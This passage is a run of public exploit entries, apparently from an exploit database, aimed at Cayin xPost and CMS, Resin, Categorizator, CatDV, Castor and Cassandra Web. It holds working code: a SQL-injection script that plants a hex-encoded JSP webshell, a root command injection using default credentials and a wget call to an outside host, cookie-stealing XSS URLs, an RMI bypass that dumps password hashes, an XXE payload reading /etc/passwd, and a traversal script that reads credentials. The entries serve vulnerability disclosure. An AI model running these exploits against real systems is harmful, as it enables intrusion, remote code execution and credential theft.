# data entry and further extends the usage of CAYIN SMP players to meet users'
# requirements of frequent, daily maintenance.
#
# Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability.
# Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp
# is not properly sanitised before being returned to the user or used in SQL queries.
# This can be exploited to manipulate SQL queries by injecting arbitrary SQL code
# and execute SYSTEM commands.
#
# --------------------------------------------------------------------------------
# lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888
# # Injecting...
# # Executing...
#
# Command: whoami
#
# nt authority\system
#
#
# You have a webshell @ http://192.168.2.1:8888/thricer.jsp
# lqwrm@zslab:~$
# --------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 10 Home
# Microsoft Windows 8.1
# Microsoft Windows Server 2016
# Microsoft Windows Server 2012
# Microsoft Windows 7 Ultimate SP1
# Apache Tomcat/9.0.1
# MySQL/5.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5571
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php
#
#
# 15.05.2020
#
import requests as req
import time as vremeto
import sys as sistemot
import re as regularno
if len(sistemot.argv) < 2:
print("Cayin xPost 2.5 Pre-Auth SQLi RCE")
print("Usage: ./wayfinder.py ip:port")
sistemot.exit(19)
else:
ip = sistemot.argv[1]
filename = "thricer.jsp"
urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid="
constr = "-251' UNION ALL SELECT "
print("# Injecting...")
cmdjsp = "0x3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612"
cmdjsp += "e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d64"
cmdjsp += "2e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0"
cmdjsp += "a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f"
cmdjsp += "323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484"
cmdjsp += "f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c"
cmdjsp += "494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e505"
cmdjsp += "55420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f"
cmdjsp += "524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657"
cmdjsp += "465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e70"
cmdjsp += "72696e746c6e2822436f6d6d616e643a2022202b20726571756573742e67657450617"
cmdjsp += "2616d657465722822636d642229202b20223c42523e22293b0a202020202020202050"
cmdjsp += "726f636573732070203d2052756e74696d652e67657452756e74696d6528292e65786"
cmdjsp += "56328726571756573742e676574506172616d657465722822636d642229293b0a2020"
cmdjsp += "2020202020204f757470757453747265616d206f73203d20702e6765744f757470757"
cmdjsp += "453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d"
cmdjsp += "20702e676574496e70757453747265616d28293b0a202020202020202044617461496"
cmdjsp += "e70757453747265616d20646973203d206e65772044617461496e7075745374726561"
cmdjsp += "6d28696e293b0a2020202020202020537472696e672064697372203d206469732e726"
cmdjsp += "561644c696e6528293b0a20202020202020207768696c652028206469737220213d20"
cmdjsp += "6e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746"
cmdjsp += "c6e2864697372293b200a2020202020202020202020202020202064697372203d2064"
cmdjsp += "69732e726561644c696e6528293b200a202020202020202020202020202020207d0a2"
cmdjsp += "0202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a"
cmdjsp += "0a0a"
columns = ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL "
sqlwrite = "INTO DUMPFILE 'C:/CayinApps/webapps/" + filename + "'-- -"
mysqli = constr + cmdjsp + columns + sqlwrite
r = req.get("http://" + ip + urlpath + mysqli, allow_redirects = True)
vremeto.sleep(1)
print("# Executing...")
r = req.get("http://" + ip + "/" + filename + "?cmd=whoami")
clean = regularno.compile("<pre>(.*)</pre>", flags = regularno.S).search(r.text)
clean = clean.group(1).replace("<BR>", "\n")
print(clean)
print("You have a webshell @ http://" + ip + "/" + filename)
# Title: Cayin Content Management Server 11.0 - Remote Command Injection (root)
# Author:LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE: N/A
Cayin Content Management Server 11.0 Root Remote Command Injection
Vendor: CAYIN Technology Co., Ltd.
Product web page: https://www.cayintech.com
Affected version: CMS-SE v11.0 Build 19179
CMS-SE v11.0 Build 19025
CMS-SE v11.0 Build 18325
CMS Station (CMS-SE-LXC)
CMS-60 v11.0 Build 19025
CMS-40 v9.0 Build 14197
CMS-40 v9.0 Build 14099
CMS-40 v9.0 Build 14093
CMS-20 v9.0 Build 14197
CMS-20 v9.0 Build 14092
CMS v8.2 Build 12199
CMS v8.0 Build 11175
CMS v7.5 Build 11175
Summary: CAYIN Technology provides Digital Signage
solutions, including media players, servers, and
software designed for the DOOH (Digital Out-of-home)
networks. We develop industrial-grade digital signage
appliances and tailored services so you don't have
to do the hard work.
Desc: CAYIN CMS suffers from an authenticated OS
semi-blind command injection vulnerability using
default credentials. This can be exploited to inject
and execute arbitrary shell commands as the root
user through the 'NTP_Server_IP' HTTP POST parameter
in system.cgi page.
Tested on: Apache/1.3.42 (Unix)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5570
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php
15.05.2020
---
Session created with default credentials (webadmin:bctvadmin).
HTTP POST Request:
-----------------
POST /cgi-bin/system.cgi HTTP/1.1
Host: 192.168.1.3
Content-Length: 201
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Smith
Origin: http://192.168.1.3
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.3/cgi-bin/system.cgi
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957
Connection: close
save_system: 1
system_date: 2020/5/16 06:36:48
TIMEZONE: 49
NTP_Service: 1
NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)
TEST_NTP: 測試
reboot1: 1
reboot_sel1: 4
reboot_sel2: 1
reboot_sel3: 1
font_list: ZH_TW
Request recorder @ ZSL:
-----------------------
Origin of HTTP request: 192.168.1.3:61347
HTTP GET request to vrfy.zeroscience.mk:
GET / HTTP/1.0
User-Agent: MyVoiceIsMyPassportVerifyMe
Host: vrfy.zeroscience.mk
Accept: */*
Connection: Keep-Alive
PoC script:
-----------
import requests
url = "http://192.168.1.3:80/cgi-bin/system.cgi"
cookies = {"cy_lang": "ZH_TW",
"cy_us": "67176fd7d3d05812008",
"cy_en": "c8bef8607e54c99059cc6a36da982f9c009",
"WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST",
"WEB_STR_SYSTEM": "SYSTEM_SETTING",
"cy_cgi_tp": "1591206269_15957"}
headers = {"Cache-Control": "max-age=0",
"Origin": "http://192.168.1.3",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Smith",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": "http://192.168.1.3/cgi-bin/system.cgi",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"}
data = {"save_system": "1",
"system_date": "2020/5/16 06:36:48",
"TIMEZONE": "49",
"NTP_Service": "1",
"NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd&
"TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6",
"reboot1": "1",
"reboot_sel1": "4",
"reboot_sel2": "1",
"reboot_sel3": "1",
"font_list": "ZH_TW"}
requests.post(url, headers=headers, cookies=cookies, data=data)
source: https://www.securityfocus.com/bid/60426/info
Resin Professional is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Resin Professional 4.0.36 is vulnerable; other versions may also be affected.
http://www.example.com/resin-admin/?q=index.php&logout=true%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
source: https://www.securityfocus.com/bid/60426/info
Resin Professional is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Resin Professional 4.0.36 is vulnerable; other versions may also be affected.
http://www.example.com/resin-admin\?%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
# Exploit Title: Categorizator 0.3.1 | SQL Injection
# Date: 03/09/16
# Exploit Author: Wad Deek
# Vendor Homepage: http://lelogiciellibre.net/telecharger/annuaire-web.php
# Software Link: ftp://ftp2.lelogiciellibre.net/lelogiciellibre/annu/categorizator031.zip
# Version: 0.3.1
# Tested on: Xampp on Windows7
# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools
################################################################
PoC : http://localhost/cms/categorizator/vote.php?id_site=1'
################################################################
# Exploit Title: CatDV 9.2 - RMI Authentication Bypass
# Date: 3/1/2021
# Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc.
# Vendor Homepage: https://catdv.com/
# Software Link: https://www.squarebox.com/download/CatDVServer9.2.0.exe
# Version: 9.2 and lower
# Tested on: Windows, Mac
import org.h2.engine.User;
import squarebox.catdv.shared.*;
import java.net.MalformedURLException;
import java.rmi.Naming;
import java.rmi.NotBoundException;
import java.rmi.RemoteException;
public class Runnable {
public Runnable() throws RemoteException, NotBoundException, MalformedURLException { }
private static int getValidSession(long createdTime, String claimedHost) {
return (int)createdTime + claimedHost.hashCode();
}
private static void printFields(SField[] fields) {
for (SField field : fields) {
System.out.println(field.fieldDefID);
System.out.println(field.value);
System.out.println(field.fieldDefinition);
}
}
public static void main(String args[]) throws RemoteException, NotBoundException, MalformedURLException {
String target = "rmi://<HOST>:1099/CatDVServer";
ServerAPI look_up = (ServerAPI) Naming.lookup(target);
System.out.println("Trying to get all connections");
SConnection[] connections = look_up.getConnections();
for (SConnection element : connections) {
System.out.println("Found connection:");
System.out.println("CatDVUser:"+ element.catdvUser);
System.out.println("ApiVersion:"+ element.apiVersion);
System.out.println("User:"+ element.user);
System.out.println("ClaimedHost:"+ element.claimedHost);
System.out.println("ActualHost:"+ element.actualHost);
System.out.println("Created:"+ element.created);
System.out.println("LastUsed:"+ element.lastUsed);
System.out.println("Client features:"+ element.clientFeatures);
System.out.println("\n");
}
System.out.println("Getting system properties");
System.out.println("Running from: "+look_up.getProperty("user.dir"));
System.out.println("Running on: "+look_up.getProperty("os.arch"));
System.out.println("Java version: "+look_up.getProperty("java.version"));
//We can create a new client from most of the fields found in the existing connections which we can dump anonymously
ClientID bob=new ClientID(
connections[0].catdvUser,
connections[0].claimedHost,
getValidSession(connections[0].created,connections[0].claimedHost),
connections[0].created,
"");
System.out.println("\nCreated a new client with parameters: \n" +
"" + "user:"+connections[0].catdvUser+"\n"+
"" + "claimedHost:"+connections[0].claimedHost+"\n"+
"" + "session:"+getValidSession(connections[0].created,connections[0].claimedHost)+"\n"+
"" + "created:"+connections[0].created+"\n"+
"" + "pubkey:"+""+
"");
String status = look_up.getStatus(bob);
System.out.println("Status is: \n "+status);
System.out.println("Attempting to dump users: \n");
SUser[] users=look_up.getUsers(bob, -1);
for (SUser element: users) {
System.out.println(element.name);
System.out.println(element.passwordHash);
System.out.println("id:" + element.ID);
System.out.println("realname:" + element.realname);
System.out.println("email:" + element.email);
System.out.println("password:" + element.password);
System.out.println("notes:" + element.notes);
System.out.println("inactive:" + element.inactive);
System.out.println("RoleiD:" + element.roleID);
System.out.println("hash:" + element.passwordHash);
System.out.println("");
}
}
}
source: https://www.securityfocus.com/bid/67676/info
Castor Library is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information that may lead to further attacks.
Caster Library 1.3.3-RC1 and earlier are vulnerable.
===========================================================
Proof-of-Concept Code and Exploit
===========================================================
Now let’s look at how Castor handles unmarshalling calls to show how an
application could be vulnerable:
In this simple class, we create Person object:
..snip..
public class Person implements java.io.Serializable {
/** The name of the person */
private String name = null;
/** The Date of birth */
private Date dob = null;
/** Creates a Person with no name */
public Person() {
super();
}
/** Creates a Person with the given name */
public Person(String name) { this.name = name; }
..snip..
Next, we generate a class that takes in external XML data to convert the
XML document to a Person Object using the unmarshalling function:
public static Person deserializePersonWithStatic(String xmlInput)
{
StringReader xmlReader = new StringReader(xmlInput);
Person aPerson = null;
try
{
aPerson = (Person) Unmarshaller.unmarshal(Person.class,
xmlReader);
}
catch (Exception e)
{
System.out.println("Failed to unmarshal the xml");
e.printStackTrace();
}
return aPerson;
}
If our application took in the XML data from a user controllable location
and passed it through this unmarshalling function, the end user could use
this functionality to view local resources on the application’s hosting
server. For example, look at the following Servlet that takes in XML data
from the Request:
public class GeneratePerson extends HttpServlet {
public void doPost(HttpServletRequest req, HttpServletResponse res)
throws ServletException, IOException
{
String evilPersonXML = req.getParameter(“person”);
Person anotherPerson = deserializePersonWithStatic(evilPersonXML);
if(anotherPerson == null)
{
System.out.println("No Person Object set");
}
else
{
System.out.println("XXE Person name: " +
anotherPerson.getName());
}
What would happen if we passed the following string into the “person”
request parameter value?:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE doc [
<!ENTITY x3 SYSTEM "file:///etc/passwd"> ]
<person><name>&x3;</name></person>
The output would be the following:
XXE Person name: ##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
..snip..
As you can see, the unmarshalling function allowed external entities to be
referenced and therefore the contents of the server’s /etc/passwd file was
set within the “name” variable of the deserialized Person object.
# Exploit Title: Cassandra Web 0.5.0 - Remote File Read
# Date: 12-28-2020
# Exploit Author: Jeremy Brown
# Vendor Homepage: https://github.com/avalanche123/cassandra-web
# Software Link: https://rubygems.org/gems/cassandra-web/versions/0.5.0
# Version: 0.5.0
# Tested on: Linux
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# cassmoney.py
#
# Cassandra Web 0.5.0 Remote File Read Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2020
#
# Cassandra Web is vulnerable to directory traversal due to the disabled
# Rack::Protection module. Apache Cassandra credentials are passed via the
# CLI in order for the server to auth to it and provide the web access, so
# they are also one thing that can be captured via the arbitrary file read.
#
# Usage
# > cassmoney.py 10.0.0.5 /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# bin:x:2:2:bin:/bin:/usr/sbin/nologin
# ...
#
# > cassmoney.py 10.0.0.5 /proc/self/cmdline
# /usr/bin/ruby2.7/usr/local/bin/cassandra-web--usernameadmin--passwordP@ssw0rd
#
# (these creds are for auth to the running apache cassandra database server)
#
# Fix
# - fixed in github repo
# - v0.6.0 / ruby-gems when available
# (still recommended to containerize / run this in some sandbox, apparmor, etc)
#
import os
import sys
import argparse
import requests
import urllib.parse
SIGNATURE = 'cassandra.js'
#
# /var/lib/gems/2.7.0/gems/cassandra-web-0.5.0/app/public
#
DT = '../'
DT_NUM = 8
class CassMoney(object):
def __init__(self, args):
self.target = args.target
self.file = args.file
self.port = args.port
self.force = args.force
self.number = args.number
def run(self):
target = "http://" + self.target + ':' + str(self.port)
payload = urllib.parse.quote_plus(DT * self.number + self.file)
try:
deskpop = requests.get(target)
except Exception as error:
print("Error: %s" % error)
return -1
if(SIGNATURE not in deskpop.text and self.force == False):
print("Target doesn't look like Cassandra Web, aborting...")
return -1
try:
req = requests.get(target + '/' + payload)
except:
print("Failed to read %s (perm denied likely)" % self.file)
return -1
if(SIGNATURE in req.text):
print("Failed to read %s (bad path?)" % self.file)
return -1
if(len(req.text) == 0):
print("Server returned nothing for some reason")
return 0
print("\n%s" % req.text)
return 0
def arg_parse():
parser = argparse.ArgumentParser()
parser.add_argument("target",
type=str,
help="Cassandra Web Host")
parser.add_argument("file",
type=str,
help="eg. /etc/passwd, /proc/sched_debug + /proc/<cass-web-pid>/cmdline")
parser.add_argument("-p",
"--port",
type=int,
default=3000,
help="Cassandra Web Port")
parser.add_argument("-f",
"--force",
default=False,
action='store_true',
help="Run the payload even if server isn't Cassandra Web")
parser.add_argument("-n",
"--number",
type=int,
default=DT_NUM,
help="Adjust the number of dot-dot-slash")
args = parser.parse_args()
return args
def main():
args = arg_parse()
cm = CassMoney(args)
result = cm.run()
if(result > 0):
sys.exit(-1)
if(__name__ == '__main__'):
main()